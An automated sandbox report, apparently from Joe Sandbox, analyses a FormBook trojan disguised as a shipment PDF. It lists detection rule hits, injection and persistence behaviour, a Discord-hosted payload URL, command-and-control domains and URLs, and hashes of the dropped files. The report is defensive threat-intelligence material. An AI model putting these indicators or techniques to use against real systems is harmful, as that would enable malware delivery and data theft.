        Source: Yara matchFile source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY

        Remote Access Functionality:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsShared Modules1Registry Run Keys / Startup Folder1Process Injection612Masquerading1OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobDLL Side-Loading1Registry Run Keys / Startup Folder1Disable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)DLL Side-Loading1Virtualization/Sandbox Evasion2Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery12SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing11DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502359 Sample: Original  Shipment Doc Ref ... Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 41 www.pampelina.com 2->41 43 www.eimzaizmir.com 2->43 45 2 other IPs or domains 2->45 69 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->69 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 9 other signatures 2->75 10 Original  Shipment Doc Ref 2853801324189923,PDF.exe 1 18 2->10         started        15 Nyedvqj.exe 13 2->15         started        signatures3 process4 dnsIp5 53 cdn.discordapp.com 162.159.129.233, 443, 49731, 49733 CLOUDFLARENETUS United States 10->53 39 C:\Users\Public\Libraries\...39yedvqj.exe, PE32 10->39 dropped 97 Injects a PE file into a foreign processes 10->97 17 Original  Shipment Doc Ref 2853801324189923,PDF.exe 10->17         started        55 162.159.133.233, 443, 49757 CLOUDFLARENETUS United States 15->55 99 Antivirus detection for dropped file 15->99 101 Detected unpacking (changes PE section rights) 15->101 103 Tries to detect virtualization through RDTSC time measurements 15->103 20 Nyedvqj.exe 15->20         started        file6 signatures7 process8 signatures9 61 Modifies the context of a thread in another process (thread injection) 17->61 63 Maps a DLL or memory area into another process 17->63 65 Sample uses process hollowing technique 17->65 67 Queues an APC in another process (thread injection) 17->67 22 explorer.exe 17->22 injected process10 dnsIp11 47 www.blttsperma.quest 37.123.118.150, 49798, 80 UK2NET-ASGB United Kingdom 22->47 49 www.jkformationfrance.com 213.186.33.5, 49800, 80 OVHFR France 22->49 51 9 other IPs or domains 22->51 83 System process connects to network (likely due to code injection or exploit) 22->83 85 Performs DNS queries to domains with low reputation 22->85 87 Uses netsh to modify the Windows network and firewall settings 22->87 26 Nyedvqj.exe 14 22->26         started        30 netsh.exe 22->30         started        32 cmmon32.exe 22->32         started        34 svchost.exe 22->34         started        signatures12 process13 dnsIp14 57 162.159.134.233, 443, 49760 CLOUDFLARENETUS United States 26->57 59 cdn.discordapp.com 26->59 89 Injects a PE file into a foreign processes 26->89 36 Nyedvqj.exe 26->36         started        91 Modifies the context of a thread in another process (thread injection) 30->91 93 Maps a DLL or memory area into another process 30->93 95 Tries to detect virtualization through RDTSC time measurements 30->95 signatures15 process16 signatures17 77 Modifies the context of a thread in another process (thread injection) 36->77 79 Maps a DLL or memory area into another process 36->79 81 Sample uses process hollowing technique 36->81

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Original Shipment Doc Ref 2853801324189923,PDF.exe100%AviraHEUR/AGEN.1103161

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe100%AviraHEUR/AGEN.1103161

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        17.0.Nyedvqj.exe.400000.0.unpack100%AviraHEUR/AGEN.1103161Download File
        1.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack100%AviraHEUR/AGEN.1103161Download File
        11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        1.0.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack100%AviraHEUR/AGEN.1103161Download File
        18.2.Nyedvqj.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        17.2.Nyedvqj.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        11.0.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack100%AviraHEUR/AGEN.1103161Download File
        12.0.Nyedvqj.exe.400000.0.unpack100%AviraHEUR/AGEN.1103161Download File
        14.2.Nyedvqj.exe.400000.0.unpack100%AviraHEUR/AGEN.1103161Download File
        1.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.3a20000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        14.2.Nyedvqj.exe.3b80000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        12.2.Nyedvqj.exe.400000.0.unpack100%AviraHEUR/AGEN.1103161Download File
        11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        18.1.Nyedvqj.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
        18.0.Nyedvqj.exe.400000.0.unpack100%AviraHEUR/AGEN.1103161Download File
        14.0.Nyedvqj.exe.400000.0.unpack100%AviraHEUR/AGEN.1103161Download File
        12.2.Nyedvqj.exe.3a40000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
        17.1.Nyedvqj.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        www.lnvietnam.online/epns/0%Avira URL Cloudsafe
        http://www.goodtasteonline.com/epns/?wVzHJ=BRWdQ6&5jz=D+mEdFX82Cju9hASn9EZxxK/L4be4H1Ia6Y0NmWcI3nDoqp7HXKUHxAIP+SNGKqRa1VB0%Avira URL Cloudsafe
        http://www.alltart.com/epns/?5jz=YHZU9vngEBQXtyB5u9xn7pvVN7OmBffp0F4sE7DtsKiVljOHBP+VVTECwxdgyHUha7VA&wVzHJ=BRWdQ60%Avira URL Cloudsafe
        http://www.jkformationfrance.com/epns/?wVzHJ=BRWdQ6&5jz=LPVhQz/sUypmh3JEMdUjrMI+o15/eDTdWMxajLbAdDKUpS6Ve6IQQzlpFhrtZO4TJx+f0%Avira URL Cloudsafe
        http://www.eimzaizmir.com/epns/?5jz=Uper38P2wFVpXLMvMK5jmH9wYxHR33YjEArLoikkDOyYqkQ8aA8asj2sgPC5P0zW7/vl&wVzHJ=BRWdQ60%Avira URL Cloudsafe
        http://www.thesidehustler.net/epns/?wVzHJ=BRWdQ6&5jz=Su3clF2JWvLFGbUo36COKrlfR2cTjWdKqgNMt2UP/lm1WcuW9iVFXF9WD2RXvaQquqUk0%Avira URL Cloudsafe
        http://www.bombers.xyz/epns/?5jz=mhsDKEoINpIYVMaR3w2yQRX/JkzkFS4RewGVgpiBV5SQmE2lgVGX8ujA+r04PphgcB3o&wVzHJ=BRWdQ60%Avira URL Cloudsafe
        https://www.thesidehustler.net/epns/?wVzHJ=BRWdQ6&amp;5jz=Su3clF2JWvLFGbUo36COKrlfR2cTjWdKqgNMt2UP/l0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        www.blttsperma.quest
        37.123.118.150
        truetrue
          unknown
          www.thesidehustler.net
          35.209.104.90
          truefalse
            high
            www.bombers.xyz
            3.64.163.50
            truefalse
              high
              HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com
              3.223.115.185
              truefalse
                high
                pampelina.com
                81.2.194.128
                truefalse
                  high
                  cdn.discordapp.com
                  162.159.129.233
                  truefalse
                    high
                    www.jkformationfrance.com
                    213.186.33.5
                    truefalse
                      high
                      alltart.com
                      34.102.136.180
                      truefalse
                        high
                        eimzaizmir.com
                        34.102.136.180
                        truefalse
                          high
                          www.goodtasteonline.com
                          unknown
                          unknownfalse
                            high
                            www.mmfaccao.com
                            unknown
                            unknownfalse
                              high
                              www.lnvietnam.online
                              unknown
                              unknownfalse
                                high
                                www.eimzaizmir.com
                                unknown
                                unknownfalse
                                  high
                                  www.pampelina.com
                                  unknown
                                  unknownfalse
                                    high
                                    www.alltart.com
                                    unknown
                                    unknownfalse
                                      high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      www.lnvietnam.online/epns/true
                                      • Avira URL Cloud: safe
                                      low
                                      http://www.goodtasteonline.com/epns/?wVzHJ=BRWdQ6&5jz=D+mEdFX82Cju9hASn9EZxxK/L4be4H1Ia6Y0NmWcI3nDoqp7HXKUHxAIP+SNGKqRa1VBtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.alltart.com/epns/?5jz=YHZU9vngEBQXtyB5u9xn7pvVN7OmBffp0F4sE7DtsKiVljOHBP+VVTECwxdgyHUha7VA&wVzHJ=BRWdQ6false
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.jkformationfrance.com/epns/?wVzHJ=BRWdQ6&5jz=LPVhQz/sUypmh3JEMdUjrMI+o15/eDTdWMxajLbAdDKUpS6Ve6IQQzlpFhrtZO4TJx+ftrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.eimzaizmir.com/epns/?5jz=Uper38P2wFVpXLMvMK5jmH9wYxHR33YjEArLoikkDOyYqkQ8aA8asj2sgPC5P0zW7/vl&wVzHJ=BRWdQ6false
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.thesidehustler.net/epns/?wVzHJ=BRWdQ6&5jz=Su3clF2JWvLFGbUo36COKrlfR2cTjWdKqgNMt2UP/lm1WcuW9iVFXF9WD2RXvaQquqUktrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.bombers.xyz/epns/?5jz=mhsDKEoINpIYVMaR3w2yQRX/JkzkFS4RewGVgpiBV5SQmE2lgVGX8ujA+r04PphgcB3o&wVzHJ=BRWdQ6true
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cdn.discordapp.com/attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqexkpvtsgqfalse
                                        high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://cdn.discordapp.com/mNyedvqj.exe, 0000000E.00000002.341260604.0000000000692000.00000004.00000020.sdmpfalse
                                          high
                                          https://cdn.discordapp.com/Original Shipment Doc Ref 2853801324189923,PDF.exe, 00000001.00000002.299070698.00000000007DB000.00000004.00000001.sdmp, Nyedvqj.exe, 0000000E.00000002.341260604.0000000000692000.00000004.00000020.sdmpfalse
                                            high
                                            https://cdn.discordapp.com/aOriginal Shipment Doc Ref 2853801324189923,PDF.exe, 00000001.00000002.299070698.00000000007DB000.00000004.00000001.sdmpfalse
                                              high
                                              https://www.thesidehustler.net/epns/?wVzHJ=BRWdQ6&amp;5jz=Su3clF2JWvLFGbUo36COKrlfR2cTjWdKqgNMt2UP/lnetsh.exe, 00000014.00000002.539177729.0000000003EF2000.00000004.00020000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://cdn.discordapp.com/attachments/895935504124612633/897863238044242010/NyedvqjjpoxzcfrzmjpjbqeNyedvqj.exe, 0000000C.00000002.322309602.00000000007DB000.00000004.00000020.sdmp, Nyedvqj.exe, 0000000C.00000002.323669387.0000000002CE8000.00000004.00000001.sdmp, Nyedvqj.exe, 0000000E.00000002.341260604.0000000000692000.00000004.00000020.sdmp, Nyedvqj.exe, 0000000E.00000002.342777768.0000000002E18000.00000004.00000001.sdmpfalse
                                                high

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                37.123.118.150
                                                www.blttsperma.questUnited Kingdom
                                                13213UK2NET-ASGBtrue
                                                213.186.33.5
                                                www.jkformationfrance.comFrance
                                                16276OVHFRfalse
                                                162.159.129.233
                                                cdn.discordapp.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                34.102.136.180
                                                alltart.comUnited States
                                                15169GOOGLEUSfalse
                                                3.64.163.50
                                                www.bombers.xyzUnited States
                                                16509AMAZON-02USfalse
                                                35.209.104.90
                                                www.thesidehustler.netUnited States
                                                19527GOOGLE-2USfalse
                                                162.159.133.233
                                                unknownUnited States
                                                13335CLOUDFLARENETUSfalse
                                                162.159.134.233
                                                unknownUnited States
                                                13335CLOUDFLARENETUSfalse
                                                3.223.115.185
                                                HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comUnited States
                                                14618AMAZON-AESUSfalse

                                                General Information

                                                Joe Sandbox Version:33.0.0 White Diamond
                                                Analysis ID:502359
                                                Start date:13.10.2021
                                                Start time:20:34:38
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 13m 14s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:Original Shipment Doc Ref 2853801324189923,PDF.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:29
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@12/5@14/9
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 48.4% (good quality ratio 44.7%)
                                                • Quality average: 73.3%
                                                • Quality standard deviation: 30.4%
                                                HCA Information:
                                                • Successful, ratio: 96%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                • TCP Packets have been reduced to 100
                                                • Excluded IPs from analysis (whitelisted): 95.100.218.79, 95.100.216.89, 20.50.102.62, 40.112.88.60, 2.20.178.33, 2.20.178.24
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/502359/sample/Original Shipment Doc Ref 2853801324189923,PDF.exe

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                20:35:46API Interceptor1x Sleep call for process: Original Shipment Doc Ref 2853801324189923,PDF.exe modified
                                                20:35:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nyedvqj C:\Users\Public\Libraries\jqvdeyN.url
                                                20:36:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Nyedvqj C:\Users\Public\Libraries\jqvdeyN.url
                                                20:36:03API Interceptor2x Sleep call for process: Nyedvqj.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASN

                                                No context

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
                                                Process:C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):796160
                                                Entropy (8bit):7.1389128083091045
                                                Encrypted:false
                                                SSDEEP:12288:oP3Sd0k2b6Yf1ls9oJ2mF6LIosXFHJ1kUH1N+BfZ8fQOwm6V:ofQob6CEoJ2OpXXp7mZ8I
                                                MD5:E954C3D029B943B054FCEB27E5E24D2D
                                                SHA1:927F6633500965F008AB556A0C1004C095E004EE
                                                SHA-256:A0703367806DE16BAC9C75C016780C0BF3B1D8C21CF7F51B6A47B6A1ABA74999
                                                SHA-512:0BE2B0B19E19F0B492E50931DC0FB311450ABEABC19250619708FC333855B9FC0CAF85B6BA01BD5423D9E11B127E880C2827DF3A499B02B553789892377843C0
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe, Author: Florian Roth
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Reputation:unknown
                                                Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................6......D.............@..............................................@...............................)......"....................`..Lx...........................P..........................`............................text............................... ..`.itext.............................. ..`.data... ...........................@....bss....`7...............................idata...).......*..................@....tls....@....@...........................rdata.......P......................@..@.reloc..Lx...`...z..................@..B.rsrc..."............N..............@..@.....................N..............@..@................................................................................................
                                                C:\Users\Public\Libraries\jqvdeyN.url
                                                Process:C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe
                                                File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Nyedvqj\\Nyedvqj.exe">), ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):96
                                                Entropy (8bit):4.912279923792357
                                                Encrypted:false
                                                SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMckYT4zssGKd6ov:HRYFVmTWDyzopssbDv
                                                MD5:CD3B33241C37E97FA912A561FCF8C86B
                                                SHA1:5A265C62E48DEE13B3227D3FD3A37EF7AD0B9642
                                                SHA-256:0DEFC12CFEA776F603B2E1FE728F648E9959898C915D416C83B23DB391475E8B
                                                SHA-512:212187E1F891C96D709E10034B149960B818623452804824A63BC86FC658CD29A4CE8481F399C62371117A1EAC5B4D57AA0715EC2FB18008D5CA621011BC80A0
                                                Malicious:false
                                                Yara Hits:
                                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\jqvdeyN.url, Author: @itsreallynick (Nick Carr)
                                                Reputation:unknown
                                                Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Nyedvqj\\Nyedvqj.exe"..IconIndex=2..
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq[1]
                                                Process:C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):283648
                                                Entropy (8bit):7.994889215647494
                                                Encrypted:true
                                                SSDEEP:6144:gMA9BxHSi2cVMq/CLqa1tZ92u8TXVIipNEl+yRDz16w:gMUBxHSi2cS1tR8ZIipNEJF1f
                                                MD5:0584CD5C8571B60FAAA2811123AC81CE
                                                SHA1:4DC74072350C1DA5B6A392B4597539BF875B01FF
                                                SHA-256:D297A238CA27D092A1A7EC63CB87C629172B50184E4C7DECC2EB0B4008F81BEE
                                                SHA-512:380CBA730298A4C51E11B85B59453E09D73965330CAE5A2F0AF12856832FFF15E5CE81A521C33B22D1A1B57F753A6849B78A3963CF02F9AE3BA5C8145D60DCCA
                                                Malicious:false
                                                Reputation:unknown
